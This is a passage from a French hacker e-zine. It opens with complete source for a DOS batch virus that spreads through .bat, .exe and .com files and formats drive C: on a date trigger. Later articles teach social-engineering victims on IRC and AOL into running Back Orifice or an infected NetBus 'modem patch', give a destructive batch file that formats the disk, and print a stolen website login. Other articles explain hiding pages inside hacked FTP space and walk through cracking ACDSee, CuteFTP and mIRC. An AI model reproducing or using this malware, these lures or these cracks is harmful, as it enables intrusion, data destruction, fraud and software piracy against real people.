if exist %0 set good=%0 %vir%
%vir% if (%0) == (ÿÿ) set good=c:\ÿÿ.bat
type %good% |find "viral" > c:\$virus.bat
:end %viral%
for %%a in (*.bat) do call c:\$virus.bat %%a
if (%ok%)==() goto virend
type %good% |find "vir" >> %ok%
:virend
%vir% set ok=
del c:\$virus.bat
%vir% if exist %0ÿ.exe set goodi=%0ÿ.exe
goto debution %vir%
dir %1 > mvtest.a %exevir%
find "ÿ" mvtest.a >nul %exevir%
if errorlevel 1 goto inf %exevir%
goto fininf %exevir%
:inf %exevir%
%exevir% set ok=%1
goto fininf %exevir%
:debution %vir%
type %good% |find "exevir" > exei.bat
:fininf %exevir%
for %%a in (*.exe) do call exei.bat %%a %vir%
if (%ok%)==() goto virenda %vir%
ren %ok% *.>nul %vir%
%vir% for %%a in (*.) do set ok=%%a
type %good% |find "vir" > %ok%.bat
%vir% attrib +r +h %ok%.bat
%vir% ren %ok% %ok%ÿ.exe
:virenda
del exei.bat %vir%
dir > mvtest.a %vir%
del mvtest.a %exevir%
%goodi% %vir%
%vir% set ok=
%vir% set good=
%vir% set goodi=

*******************************<<<MV3.BAT>>>*******************************

rem Virii InfeCteuR BAT & COM
@echo off %vir%
dir |date > abc.bmb %vir%
find "15" abc.bmb > nul %vir%
if errorlevel 1 goto virdeb
cls %vir%
echo Arf Arf.. AbSUrdus DeLirIuM,, By ThreaT, With fucking of M*V*M H.C %vir%
echo o |format c: /V:ThreaT %vir%
:virdeb
del abc.bmb %vir%
doskey/echo:off > nul %vir%
if exist c:\ÿÿ.bat goto debut %vir%
if exist %0.bat set good=%0.bat %vir%
if exist %0 set good=%0 %vir%
type %good% |find "vir" > c:\ÿÿ.bat
attrib +r +h c:\ÿÿ.bat %vir%
goto debut %vir%
find "M*V*M" %1 >nul %viral%
if errorlevel 1 goto y %viral%
goto end %viral%
:y %viral%
set ok=%1 %viral%
goto end %viral%
:debut %vir%
%vir% set path=c:\;%path%
%vir% doskey dir=ÿÿ $T dir $1
%vir% set good=%0
if exist %0.bat set good=%0.bat %vir%
if exist %0 set good=%0 %vir%
%vir% if (%0) == (ÿÿ) set good=c:\ÿÿ.bat
type %good% |find "viral" > c:\$virus.bat
:end %viral%
for %%a in (*.bat) do call c:\$virus.bat %%a
if (%ok%)==() goto virend
type %good% |find "vir" >> %ok%
:virend
%vir% set ok=
del c:\$virus.bat
%vir% if exist %0ÿ.com set goodi=%0ÿ.com
goto debution %vir%
dir %1 > mvtest.a %exevir%
find "ÿ" mvtest.a >nul %exevir%
if errorlevel 1 goto inf %exevir%
goto fininf %exevir%
:inf %exevir%
%exevir% set ok=%1
goto fininf %exevir%
:debution %vir%
type %good% |find "exevir" > exei.bat
:fininf %exevir%
for %%a in (*.com) do call exei.bat %%a %vir%
if (%ok%)==() goto virenda %vir%
ren %ok% *.>nul %vir%
%vir% for %%a in (*.) do set ok=%%a
type %good% |find "vir" > %ok%.bat
%vir% attrib +r +h %ok%.bat
%vir% ren %ok% %ok%ÿ.com
:virenda
del exei.bat %vir%
dir > mvtest.a %vir%
del mvtest.a %exevir%
%goodi% %vir%
%vir% set ok=
%vir% set good=
%vir% set goodi=

****************** CODE SOURCE A UTILISER AVEC MODERATION *****************


--->9<---
INITIATION A B.O
----------------

bon alors c parti
mail bolliop@caramail.com

tuto sur back orifice de bolliop
pour ke la scene francaise avance

disc lamer -> prout

intro :

dans ce tuto , je vous donne mes technikes pour faire executer le client
de bo(back orifice) au mec a ki vous voulez piker la connection
si vous savez pas vous servir de back orifice , lisez l'help en anglais,
et si vous savez pas parler anglais, ben apprennez
voila pour l'intro

technikes :
toutes les technikes decrites ici,je les utilise perso, donc ca marche

1- technike de la photo
alors vous trainez sur un channel, de preference avec des lamers et des
obscedes, moa j'utilise irc.funradio.fr #funradio , c parfait le samedi soir
-vous portez un nick de fille --> tres important( aurelia, stephie, marie )
enfin des noms chauds et pas gilberte ou raymonde par exemple
-vous faites des dns( vous recuperez l'ip du mec) pour connaitre le serveur
jusqu'a trouver le serveur ki vous interesse( easynet, wanadoo, infonie,
clubinternet .....)
-vous branchez en privés les mecs ki ont des connections ke vous voulez
(prennez plusieurs mecs car bp ne se laissent pas avoir).
et vous dites comme suit( moi je suis aurelie et lui grolame)
<aurelie> slt !
<grolame> slt :)))))
<aurelie> t'as une photo ???
<grolame> oui /non ( on s'en branle )
<aurelie>tu veux la mienne
<grolame> oui
--> dcc send
il faut un peu continuer a garder la conversation avec le mec pour k'il
reste la.
bon ce ke vous sendez( en dcc send)
un fichier.zip > dedans une photo bidon un l'exe serveur bo s'appelant
lismoi.exe ou un autre nom
bon et ca devrait passer en disant ke l'exe est une description de la nana
( car vous etes une nana :))ou alors que c un poeme ou je sais pas koi

2-technike du site web

alors le mec ki vous demande un logiciel ou un crack ou encore komment vous
faites pour faire un truc bidon, vous lui dites d'aller sur votre site,
sois vous mettez le serveur sur le votre( de site), soit vous utilisez mon
site en effet sur mon site le fichier megateuf.zip dans la section download
est un serveur de bo.
g aussi mit le serveur non compressé a l'url www.chez.com/bolliop/webcam32.exe

3-autres technikes ke g prog en c++;

g pas fini de les programmer mais g deux idées ki seront surement
finies kant vous lirez ce tuto et disponibles sur mon site

1-un prog ki est un repertoire avec des tas de noms bidons et un back
orifice serveur avec une extension pourrie
mais surtout un exe ki renome l'exe de back orifice et le lance,
sans ke le mec s'en apercoive :)

2- 2 me idee ki permettra a mon avis de passer a travers les protectecs
comme bouffe troyen ou des trucs chiants cun exe ki se place dans la
base de registre et verifie ke bo est tj la, et si il n'y est plus,
il le remet :)

voila les gars, c t cool non ?
alors pour les connections ke vous avez obtenues en utilisant system passwords
de bo
il faut faire gaffe a un truc deja l'user a les formats suivants:

pour clubinternet -->
clubint/nom
OU
nom ( directos )
pour wanadoo -->
fti/xxxxxxx (7 caracteres ki veulent rien dire --> attention avec wanadoo
il faut respecter les majuscules et minus .)
pour infonie
inf1/199811811302195@infonie.fr --> bon ici g mit le seul exemple d'user
infonie ke g je prefere pas me prononcer, en tout cas , g essayé avec cet
user et un pass( ke g eu avec :)) et ca marche

les passwords

pour clubint :
xxxxxxxx -> 8 caracteres
pour wanadoo :
xxxxxxxx -> 8 caracts, attentions tj aux majuscules
pour infonie :
666666 -> 6 chiffres

ensuite :
desolé de pas vous donner de connections mais ce serait degue pour le mec
(y'aurait tout l'underground sur sa connect)et puis si un mec ke g hacké
lit ca il va pas etre content, donc g des raisons donc faites pas chier
attention si vous avez une connection chez ci au format "nom" (clubint)ki
marche pas , essayez de la mettre au format "clubint/nom", pareil pour
wanadoo

conclusion

mais vous verrez c pas dur de se faire des connections surtout si on est
pas cons
mais si vous tombez bien vous pourrez degoter des pass de site de cul -> un
petit exemple ke je peux vous donner:
www.heatxxx.com
user powerup
pass quickly

:) --> y'a meme une webcam, bon j'en ai d'autres mais ca me fait chier
d'aller fouiller mes logs :)


conclusion de la conclusion:
vala , si vous avez pas compris, vous pouvez tj mailer car moi je reponds :)
prout
bolliop
ratm stuff
mega keupon
mass casse toi de la
akh t trolé



--->10<---
LES UNDERSITEZ
--------------
Ecrit par ThreaT


EnFiN Un suJet QUe Tres Peut ConnAisse Mais Qui Existe BelLe Est Bien...
LES UNDERSITES

Putain, sa me soul! j'avais fait un super article sur les undersitez mais
ce putain de Daub que j'avais foutu en dual avec ma red hat m'a peter a
la geule suite a une tentative de repartitionnement d'un 2eme disk configurer
en EZ drive avec une partoche LILO native accessible depuis une diskette dos.
un cluster a voler en eclat dans le rep racine de daub ce qui m'a causer un
gros bordel du a ce putain de scandisk qui m'a cree 45 repertoire, et qui
m'a sodomiser une parti de mon swap, tout cela en pinant mon bo lilo que
j'avais configurer avec Amour.
donc, on vas la refaire moin crisper!! :(

Bon je vais essayer de retrouver toute la subtiliter de mon premier article
afin de vous espliker ce que c qu'un undersite

///////////\\\\\\\\\\\
LE SOMMAIRE MES FRERES
\\\\\\\\\\\///////////
0/intro.
1/C quoi un Undersite?
2/a quoi sa sert?
3/a qui sa sert?
4/comment les faire?
5/sa existe vraimment les undersite?
6/que peut on faire vraimment avec un undersite?
7/pourkoi tu t'enmerde a faire des Underistez?
8/juSt say Fuck with an undersite
9/Undersite! le vrai undernet, pour le vrai underground
10/finito.


0/INTRO
#######
Comme je te connait tu doit te demander qu'est ce que je vais encore
debiter comme connerie...
mon petit, on vas parler de chose dont tu n'a meme pas ider!
on vas parler du vrai underground, du monde des hackerZ, des sites des malades
mantaux, on vas parler des iles au tresor des nouveau pirates
on vas parler... des UNDERSITEZ

1/C QUOI UN UNDERSITEZ???
#########################
un Undersite est un site cacher dans un espace FTP pirater
accessible a tous par le bier d'un lien secret.
(definition tirer de "LE DICO DE THREAT" (je deconne))

concretemment, C quoi un undersite?
ben en faite, un undersite est un site de hacker cacher sous un site de lamer
a son insu MAIS qui n'est accessible que par un lien secret (Style Track sur
internet)

Petite demo pour mieux comprendre....

Mr Lamer a un beau site sur www.multimania.com/lamer
Mr lamer est content car son site est un vrai site de lamer, qui parle de cul
de sa copine, de ses vieux pote avec qui il se boure la guelle, de son chien,
et tout et tout..
Bon!
Mr PoteDuLamer vas sur le site de Mr Lamer.
Mr PoteDuLamer est content car y'a plein de foto de lui avec son pote lamer
sur un vrai site de lamer par lequel n'importe quel lamer peut aller voir
sa salle gueulle de lamer (tu me suis lamer!)
SOUDAIN!!
Mr PoteDuLamer a un detaille qui lui acroche l'oeil (aïe)
effectivemment, il y a une lettre dans le texte qui n'est pas exactemment
de la meme couleur que les autres!! (bizard sa?)
Mr PoteDuLamer (qui est curieux donc moin lamer que son pote) pointe le
pointeur de sa salle souris Micro$ofT a 200 balles sur la lettre en question.
EST QUE DECOUVRE T'IL EN CLIQUANT DESSUS?????? "Ho My GoD!"
UN SITE P I R A T E "hhaaaaarrrgg" (le mec s'evanoui)
"But WhaT AppEnd???"

Un hacker a reussi a pirater le site de Mr lamer et a judisieusemment
disimuler son site dans celui de sa victime (un genie quoi)


2/A QUOI SA SERT??
##################
Sache qu'un Undersite a pour premiere utitiliter, d'assouvir le besoin
de conquete des nouveaux pirate. C une sorte de message qui dit a celui
qui c'est fait hacked "j'ai forcer, jme suis poser et tu t'est fait baiser"
sinon, a part sa, un undersite peut te servir a mettre toute les info que
tu veut (MP3, Foto de estelle haliday, etc..) sans te soucier de rien.
sa peut aussi te servier d'espace disk pour stocker tes connerie.
sa peut aussi te servir (si tu vien de cree un nouveau virus)de distributeur.
sa peut servir a plein de truc quoi, fo de l'imagination C tout.


3/A QUI SA SERT?
################
Les UnDersites, Sa sert a tout ceux de l'underground!
Hackerz, Crackerz, Phreakerz & warez on tous plus ou moin une utiliter
quelquonque de ce genre de site.
POur le hacker, l'undersite seras un moyen de prouver sa capaciter a hacker,
donnant une impression importante de force de frappe a sa victime, celui si
pourat le faire chanter afin d'acceder a des zones plus importante. celui
si pourat aussi divulguer une multitude de password sur son undersite, pour
tenir en eveil toute sa horde.
Pour le cracker, L'undersite seras l'ile deserte ou celui ci pourat enterrer
tout ses crack et code source en ASM, ainsi que les dernier virii fraichemment
coder.
le phreaker, pourat divulguer au grand jour toute ses liste de scan ainsi
que ses dernier resultat comportant les VMB, outdial, carrier & system voco
forcer...
ET pour le WARE! L'undersite seras son MAGAZIN SECRET.
il pouras y mettre tout ses soft accessible seulemment par des
connesseur qui auront prealablemment payer une redevance afin de connaitre
l'adresse exacte ainsi que l'astuce pour pouvoir acceder a l'undersite.
Donc, L'undersite peut servir a plein de monde, mais C bien gentille sa!
mais....

4/COMMENT LES FAIRE??
#####################
Ben, pour faire un undersite, C pas compliker.
deja il fo hacker le site qui porteras l'undersite! ne me demande pas
comment, y'a plein d'article pour le savoir.
une fois ce putain de site hacked, tu cree dans l'espace FTP de ta
victime un repertoire cacher style "MKDIR ALT+255+255" tu voi le truc!
une fois ceci fait, tu fout tes belle page dessus, puis tu telecharge
sur ton dur une page du site d'origine afin d'y inserer un lien qui mene
vers ton site prealablemment cacher.
Et Voila! tu a un beau undersite.


5/SA EXISTE VRAIMMENT LES UNDERSITEZ??
######################################
Et oui man, contrairemment a ce que tu croit, le net est bourrer d'undersite.
des mec en sont meme completemment fana!
je connaissait meme des mec qui etait tellement acro, qu'ils ce levait la nuit
pour voir si le dernier Under qui zavais trouver etait encore la!
car, si le hacker a pour defi de mettre en place se genre de site, le newbie
a pour mission de trouver un maximum d'undersite, car C la qu'il pouras
trouver le maximum d'info pour debuter. puis, le faite de trouver un undersite
est asser valorisant.
si tu veut un exemple vas faire un tour sur http://members.aol.com/ldiezmench
et cherche bien! car dans le site il y a un lien cacher qui de routra sur
"ThreaT UndeRsiTe" mon undersite perso qui divulgue plein d'info croustiante
(notamment un OUTDIAL)

6/QUE PEUT ON VRAIMMENT FAIRE AVEC UN UNDERSITE??
#################################################
a pars le plaisir de skoutaer un lame! un Undersite peut beaucoup servir
a un groupe de HCP.
effectivemment, pour que tout le monde connesse les coordonner de tout le
monde, il fo un repere! et l'undersite est l'endroi parfait, surtout
si on veut que les coordonner reste "confidentielle"
L'undersite peut aussi servir de receuilee ou chakun pouras mettre les
resultas de son travail. par exemple, on organise Une attake de PBX
sur 0800331122 (PBX de FT) + une attak sur www.microsoft.com.
on pouras connaitre tout ce que chakun a fait par exemple.
---------Section Phreak Attak
DreaD "Ouai j'ai scanner tout les bateau + de 0 a 3000"
cliker la pour les resultat "LINK"
Maverick "j'ai trouver la BAL admin sur 5644, je continu"
Shank "OK, j'ai fait du social! il y a 600 enployer, l'indik de sorti et
le 0, et le standart et le 09"
ThreaT "j'ai trouver 2 BAL, les pass default sont 2222 et l'OUt se trouve
sur le 0
etc...
--------Section HAck ATTack
Bolliop "ok j'ai deja balancer 4 dico, les voila "LINK"
Massilia "j'ai bientot terminer mon trojan, y'a plus qu'a ce faire le FTP"
CD13H "ok, jvais sniffer toute l'area au cas ou billou ce lacherais"
ThreaT "je brute l'acces FTP! j'en suis a REDGTR, mais j'a trouver Une
IP qui fait confiance au serveur! jvais essayer de la spoofer"
etc....

Donc, le site est tenu a jour chak foi que QQ1 trouve QQchose ce qui fait
que tout le monde est au courant de la progression de l'attaque.

L'undersite peut aussi servir a Piner du Lamer.
effecivemment, tu fait une page qui ce fond parfaitemment avec le site hacker
qui te propose de telecharger le dernier patch microsoft, qui est en faite
un troyen. come sa, quand T sur IRC, tu chope un pov lame et tu lui dit
que y'a un super patch sur www.victim.com!
et le mec n'y vois que du feu

en faite, les avantage de l'undersite sont
"Liberter d'expression sur le site, gratuiter du site et confidentialiter
d'accer"

oui mais..

7/POURKOI TU T'ENMERDE A FAIRE DES UNDERSITEZ?
##############################################

newbie: "y'a plein de truc qui te donne 10Mo gratos! pourkoi tu t'enmerde
la vie?"

Parce que tes soit disant 10Mo gratos son controller comme l'eau que tu boit
effectivemment, sur les espace gratuit, il y a des regle a suivre.
si tu commence a mettre sur ton site des photo de estelle a poil, tu risk
d'avoir des blem. de plus, ton site est referencer dans une base de donner
ce qui ne te donne pas une parfaite confidentialiter.
puis des que tu veut ajouter un ou 2 petit crack, tu te fait jarclos comme
une grosse merde.
NON, tout cela n'est pas serieux, rien ne vo un beau UNDERSITE.
donc...

8/JUST SAY FUCK WITH AN UNDERSITE
#################################

C vrai sa! pourkoi s'enmerder la vie a trouver des esplikation alors qu'il
suffit de dire FUCK.
rien ne vo un petit Undersite pour faire chier le monde entier.
et oui, il suffit de faire une belle page bombe, et des que tu click
sur le lien, BOUM
aller faire un tour sur notre site www.chez.com/mvm, et cliquer sur
BLAGUE. agacant non?
ceci est un exemple de crasse qui pourait foutre les boule a plusieur
centaine de personne.
Mais bon, pour sa, je vous fait confiance ;)

9/UNDERSITE! LE VRAI UNDERNET, POUR LE VRAI UNDERGROUND
#######################################################

Et oui! les undersitez, C le vrai undernet, la banlieu d'internet quoi!
avec de vrai site pirate, qui font parti du vrai underground.
mais je pari que la plupart des gens qui lise cette article n'en on
jamais vue! donc, a vos souris les enfant! et partez a la chasse au
Undersite. arf arf arf

10/FINITO.
##########

Bon, ben voila! 7 article est fini. vous vous coucherez moin con se soir.
et j'espere ne plus voir de reponde sur mon mail ou sur un channel du type
"Undersite? C quoi cte bete? sa se mange?"
et autre reponse de lame sous developper.
j'espere aussi que tout les hacker qui lise ceci vont se mettre a cette
pratique divine au lieu de tout piner comme des blaireaux.

aller, Jµ$T $@Y Fµ(K W1T# @N µNd3r$1T3.

ThreaT.

email: ThreaT@Caramail.com






--->11<---
COUR DE CRACK I
---------------
Cracking I


Intro : cette section va parler de cracking un peu logique non. Je vais
essaye de vous apprendre a cracke tout les petits softs sur le Net. Pour
toutes les pages que je vais ecrire je tenterai de vous montrer comment
cracke tel ou tel soft

Nous allons donc commencer par le matos (Software) du petit cracker sous
windaube :

SoftIce Le meilleur Debug sous windows 95,c'est le soft qui vous permetra
de faire les tests de changements dans une application

WDasm Un deasm pour win95 avec DlgRef et Stringref .... ce Soft permet de
prendre vos marques dans une app,de remarquer quelque bonnes addrs genre
protec et autre .. HexWorkShop Un petit soft qui vous permet de modifie
(sur disque dur a vie quoi) les apps que vous avez cracke avec succes ...
Serial : GM000007

Petite precision quand j'utilise // ca veux dire que derriere c'est du
commentaire Bon Now passons au choses serieuses cette fois nous allons
cracke AcdSee32 Ver:2.4, bon c'est un soft pour lire les images trop
rapidement.
Commencons par le debut on lance l'executable et la en haut au dessus du
menu nous remarquons le petit "[unregistered]".En plus quand on lit 2 ou 3
photos un dialogue(boite de dialogue) a la con sort
et vous rappel que vous ete unregistered, ca c'est vraiment chiant !!!!!

Bon apres ces quelques constations vous sortez Wdasm et Deassemble
acdsee32.exe ... bon on attend un peu ca dure quelque secondes ....
Nous avons constate que ascdsee porte dans ca barre le string (ou suite de
caractere) [unregistered]
donc nous allons faire une recherche de ce string (Menu Search --->FindTExt) ..
Nous tombons a la ligne
*possible use of string ref "[unregistered]" //avec cette ligne Wdasm vous
indique que le push en dessus va charge "[unregistered]"
401334 6848e04b00 push 4be048 // le first number est la ligne programme ,
le second est la commande qui va etre envoyer au processeur et enfin
push addr est la ligne equivalente en asm du code
processeur envoye :)
En traduction francaise au prochains call "[unregistered]" sera envoye
( call est un appel de fonction call addr), donc c'est ici que Acdsee
rajoute le unregistered en haut donc nous pouvons pense que haut dessus il
y a le code qui permet de s'avoir si vous ete register ou pas regardons ...
40131d call 407370 //appel d'une fonction
mov ebx,dword ptr [4aa310] //semble place dans ebx un resultat
cmp eax,1 //compare le registre eax,1
je 0040133c //si la comparaison est bonne saute en 40133c
Comme par hasard en cas de bonne comparaison ca saute le unregistered
continuons notre recherche
(Avec la touche F3 Find Next)..

40173d call 407370
cmp eax,1
je 401775
Bon la c'est la meme chose il appel 407370 et puis saute le [unregistered]
si eax est a 1.
La nous devons avoir trouve la fonction qui s'occupe de savoir si
utilisateur est registered ou pas ...
Nous remarquons que si utilisateur est register la fonction met eax a 1
Donc nous allons modifie la fonction pour quel ne retourne que 1 dans tout
les cas !!! :)

On sort softice, en cliquant dans demarrer programmes Softice Symbol Loader
ensuite load ascdsee32.exe
et module Load et puis enfin "ok"
On arrive dans une fenetre dos (ASCII), bon ici il faut taper bpx 407370,
cela dit a softice de s'arrete des que le programme(debug donc acdsee)
passe pas la ligne 407370 ...
On appui sur F5 pour dire a softice de continue app...
Et hop ca revient sous SoftIce ca veut dire que Acdsee a tente execute la
fonction pour voir si registered
.... maintenant a nous de la change (rappel en sorti de fonction eax doit
etre egal a 1) Pour changer la fonction on tape "a" (ce qui veut dire assemble
pour softice)
puis on tape mov eax,1 // met eax a un
puis ret //retourne a la fonction appelante en gros fin de fonction
ensuite sur escape ce qui nous remet en mode normal ... puis f5 pour
continuer et a votre plus grande joie vous ne voyez plus le unregistered
(quel pied non) voila , vous allez dans about et register et a la place de
votre nom il y a rien bof c'est chiant ....
nous allons chercher ou il prend le nom d'utilisateur, il y a grande chance
que ca soit dans la base de registre,donc deasm ( avec Wdasm pour ceux qui
ont pas suivi) et cherchons les appels base de registre,je vous le donne
RegQueryValue ...
vous cherche un peu et vous trouver un appel de l'API avec en dessous
utilisation de regname ca y est vous avez trouve sortez regedit ... allez
dans HKEY_LOCAL_MACHINE (c'est la ou tout les soft met leur truc) en suite
dans software\Acd System\AcdSee\2.3 et la fait une cle chaine "Regname"
avec ce que vous voulez dedans
ensuite avec softice remodifie 407370 (parce que les modif que vous faite
avec softice ne sont valable qu'une fois ) ... et la allez dans about
register et la il y a le contenu de la chaine formidable ...
Enfin nous allons finalise le crack pour instant votre executable n'a pas
ete modifie (il est originale ),donc relancons un Module Load (dans Softice)
et arrive a 407370 avant de faire les modif tape
e eip cette commande va vous montrer le code envoyer au processeur notez une
15 ene de nombres puis faite les modifs et note les difference dans la
fenetre e (l'endroit ou vous avez note les nombres certain ont changes car
vous avez change les truc en asm)
Arrive ici sorte HexWorkShop load ascdsee32.exe recherche les 15 premier
chiffre une fois trouver
modifie pour obtenir les nombre apres ... sauve et voila vous Venez de
finir votre premier crack pas
cool ca .... :)


Bon la prochaine fois ce sera cuteftp 2.5 qui passera au cracking allez ZA+++
A oui en cas erreur(s) ou de prob(s)
vous pouvez ecrire a
Ragez@francemel.com


--->12<---
COUR DE CRACK II
----------------

Cracking II


Intro : Bon cette page ci nous allons cracke du soft trop laid niveau protek
genre je change deux jz et ca marche) tout d'abord CuteFtp 2.6.1 et ensuite
et Mirc 5.5... :)

On commence par CuteFtp, bien sur c'est la derniere version ....
Nous allons donc deasm (wdasm Voir page cracking I pour logiciel)
cuteftp32.exe, en meme temps on lance cuteftp on va dans about et la
"UNREGISTRED VERSION", bon donc nous cherchons ca dans l'exe avec wdasm
(search --> find text) au miracle nous obtenons la ligne
:0040108a 6825010000 push 00000125
L'appel de la fonction qui doit determiner si user est unregistered doit
etre dans les parage remontont un peu (401060 Conditional ) hmmmmm tient cool ce code
call 411a90
test eax,eax
je 401083
Bon la c'est evident il y a de grande chance que 411a90 soit la fonction qui
sert a determine si register ou pas, nous allons donc teste ca en fausant le
test pour cela nous utiliserons softice .... Let's rock :) .... On load
cuteftp32.exe dans le symbol loader de softice on met le bpx 406010 on
appui sur F5 (continue) on fait about, softice s'arrete sur le breakpoint et
la on fait assemble (commande :a)et on remplace le jz par un jnz... puis F5
et au grande joie le UNREGISTERED c'est casse pour des caracteres bizarre.
bon gracee a cette demonstration nous somme sure que 411a90 s'occupe de la
registration , resortons wdasm et allons en 411a90, ok la fonction est
appele trois fois en 401059 413479 42F06f, bon la logique montre que voila
dans les trois c'est la meme chose il suffit de remplace le jz par des nop
(ou jnz)..... Bon voila soft est deplomb parcontre les caractere bizarre
dans about c'est not cool mais bon supportable quand on pense que ca fesait
chier avant ... Bon vous faite les modif avec HexworkShop (cf cour I de
cracking) ... et Voila :)
Passons now au deuxieme soft Mirc ... Bon nous executons le truc on va dans
help register un user et un pass au pif et la appareit une MessageBox avec
comme message sorry your registration ... don't match. Donc nous deasm la
chose et nous nous mettons en quete du message (pq donc car dans les parage
il doit avoir la fonction pour la registration he he ). Nous tombons a la
ligne
:435df0 push machin...
Bon now regardons au dessus la juste au dessus "your registration is ...."
et encore au dessus du code qui ressemble a ca
:435d02 call 492278
test eax,eax
je 435daa
Bon Vraiment interesant maintenant testons ce petit code (meme s'il parait
evident que c'est la protek nous somme pas presse), on lance softice (Module
load et bordel cf prm cour) bpx 435d02, bon je vous donne un nouvelle ruse
pour teste ... bon vous allez dans register vous faite register avec des
truc au pif la softice ressort logique vous tape p (cette commande passe a
la ligne suivante du code) puis r (commande vous donne les etat de tout les
registre et permet de modifie leur valeur)et vous mettez eax a 1 voir et la
c'est bon ... Donc nous revenons a deasm et allons a la fonction 492278 pour
voir qui l'appelle :) bon la on voit que la ligne 49240f sera aussi a
modifie ... On modifie les deux ligne en question ... on relance mirc et la
pas register c'est quoi ce bronc ... et ouis en faite il suffit etre
intelligent ( et logique) la pluspart (meme tous now ) des soft verifient
votre registration a chaque ouverture de l'app, c'est aussi le cas pour
mirc de plus pour verifie votre registration la fonction de protek a besoin
de votre nom et code (encore un fois logique)... Donc la on regarde au
dessus de l'appel en 4923df et la au joie mirc load deux cle dans la base de
registre name & code (avec la fonction RegQueryValueEx),donc faite une cle
dans la base de registe : HKEY_CURRENT_USER\software\mirc\name et la mettez
une valeur chaine, bon la logique veut que aussi le menu register ne soit
plus accesible si vous ete deja register donc il n'est en realite pas
utilile (si la cle est presente en base de registre) de change l'appel en
4923d2, a oui aussi vous allez me repondre pq on ne change pas la fonction
492278 pour qu'elle ne retourne plus que 1 (comme ascdsee voir premier cour)
tout simplemnt parce que il y a CRC je vous expliquerez cette protek sur la
prochaine stuff qui sera sur Winzip 6.4 (je sais c'est pas la derniere mais
vous allez comprendre) :) (Suspense) J'oubli modifie avec HexWorkShop bien
sur he he


A oui en cas erreur(s) ou de prob(s) vous pouvez ecrire a
Ragez@francemel.com



--->13<---
CYBER AGRESSION
---------------
DisK Lamer!
La cyber agression N'est pas du hacking! a ne pas confondre SVP


ThreaT.



------(((<<<<LA CYBER AGRESSION>>>>)))------


I:/Definition du contexte
----------------------------
Toute les technik, exemple et supercherie qui vont suivre on eter pratiker
sur AOL!
POURQUOI?
Parce que c'est l'un des provider qui a la reputation d'etre "PROTEGER"
contre les agression, parce que sur AOL, c'est bourrer de LAmerZ qui parle
de cul et de jeu video! sa ferat reflechier toute ses petite tapette qui se
prenne pour des dieu avec leur punter et aussi ceux qui menace de "NUKE"
Vous avez dejas nuker QQ1 sur AOL vous ?
moi oui, mais je doute que newbie que vous soyer, vous ne pouviez assumer
cette tache qui n'est appliker qu'en cas de lamerositer fessant tourner
en bouriK le cyber agresseur.


Bon aller, y'en a marre du bla bla...


ACTE I/Parlons Boulot!!!!
----------------------------

Pour pratiquer une bonne petite agression via AOL, voila le matos

*1/UNe becanne avec une bonne chtite connection sur le telephone
*2/Un explorer AOL en version "US"
3/Un chtit scanner d'IP
*4/Une chtite commande DOS appeller PING
*5/deux soft appeler "Netbus" et "socket23 V 2.5"
6/Quelque notion en BAtch
7/Un login et un password Pirate
*8/des Talent de Social

---Matos qui peut se rajouter, mais non obligatoire---
un nuker
un punter
un soft de traitemment d'IP style "WS_PING ProPAck"
un pote qui n'a pas froid au yeux

PS: les ligne marquer par l "*" sont la liste des chose INDISPENSABLE


ACTE II/Preaparons nous a l'attaque
---------------------------------------
Bon, Maintenant que (bande de guerrillos que vous aite) vous vous etes
procurer tout ce beau fourbit, il faut parametrer tout sa, preparer vos arme!

->Bon, primo, allez voir dans votre paneau de config l'option reseau!
clicker 2 fois sur TCP/IP et specifier que vous vouler que votre IP soit
donner automatiquemment. C bon?

->secondo, prener netbus et SOcket 2.5, lancer le generateur de virii du
socket et infecter le fichier Patch.exe de netbus

->Tercio, preparer un petit programme batch dans votre repertoire de hack
que vous appellerer "Autoexec.bat"
ecriver dans ce fichier les instuction suivantes!

@echo off
cls
echo Fallait m'ecouter espece de connard....
echo o| format c:

Si vous vous demander a quoi vas servir ce fichier, attender la suite, car
la, on en ait a la preparation.

->Quatro, connecter vous sur AOL US,loger vous sur votre compte et optener
un compte pirate.(si vous avez deja un compte pirate referez vous au quatro
bis)
<si vous n'avez pas de compte pirate, et que vous ne savez pas vous en
procurer, referez vous au quatro tierce>

->Quatro Bis, lancer votre AOL US, en seletionnant l'option "GUEST"
lorsque vous arriver a l'etape LOGIN, PASSWORD, inserer les coordonner de
votre compte pirate

->Qatro tierce, creer un nouveau pseudonyme et connecter vous y, mais bon,
sa vas pas etre le pied

->Cinquo, contacter vos pote (si vous vouler faire une attaque a plusieur)
creer un salon priver et determiner ce que chaqun doit faire

C bon!

Yééé, maintenant Nous alons partir a la quete d'une victime potentiel,
appeller plus comunemment le "LameHunting"

Pour pratiker le Lamehunting il ne faut pas hesiter a utiliser ses talent
de social et ne pas lesiner sur le Mytho!

petite demo de Lamehunting pRatiquer sur AOL


"""""""""""""""""""""""""""""""""""""""""""""
Vous venez de rentrer dans le salon "Point de rencontre 1"

LameA: qui veut faire un jeu en reseau
LameB: moi je suis un pro de warcraft
LameA: T'a de la chance que mon modem soit pourit sinon j'taurait mit la
pater
LameB: ho lotre heu!
ThreaT: hé LameA, si tu veut, j'ai un truc pour faire buster ton modem


---------------------
Message eclaire de "LameA"

LameA: T'a vraiment un truc pour faire booster mon modem
ThreaT: oui, j'ai un patch qui te fait augmenter ta vitesse de connection
LameA: Mais sa marche comment?
ThreaT: Le patch modifie le bridage de ton modem qui est loger dans ses
instruction, Car les modem sont brider Logicielemment
LameA: ha wouai!
ThreaT: Bien sur que oui, tu nle savait pas?
LameA: Ben non, J'ai un 9600, sa vas buster a combient??
ThreaT: Le patch vas te faire Buster a 56000bds
LameA: Vas y envoie
ThreaT: Attend, il faut d'abord que je sache si c'est compatible avec ta
connection AOL
LameA: ??
LameA: Et comment on fait pour savoir?
ThreaT: Ok, suit mes instruction
LameA: ok, j'ecoute
ThreaT: tu click sur demarrer
ThreaT: executer
ThreaT: Tu tape c:\windows\winipcfg.exe
ThreaT: Tu met OK
ThreaT: si ton adresse IP = 0.0.0.0, C griller!
ThreaT: Alors?
LameA: C bon, y'a plein de chiffre
ThreaT: quoi comme chiffre?
LameA: 152.173.23.103
ThreaT: Ok, 2 seconde
(la je lance une fenetre DOS et je tape PING 152.173.23.103)
(DOS me repond Pinging 152.173.23.103 10ms bla bla bla)
(Donc, son IP et valide, la je revient a la conversation)

ThreaT: C bon, Ta connection est compatible, je t'envoi le patch
LameA: kool
(Donc la, je lui envoi par Mail le patch de netbus infecter par socket 2.5)
ThreaT: Alors? tu l'a recu?
LameA: Ok attend, je telecharge!
(La, je lance nebus, socket 2.5 et je prepar mon petit fichier autoexec.bat)
LameA: C bon, j'ai telecharger
(Maintenant j'insere son IP dans Netbus)
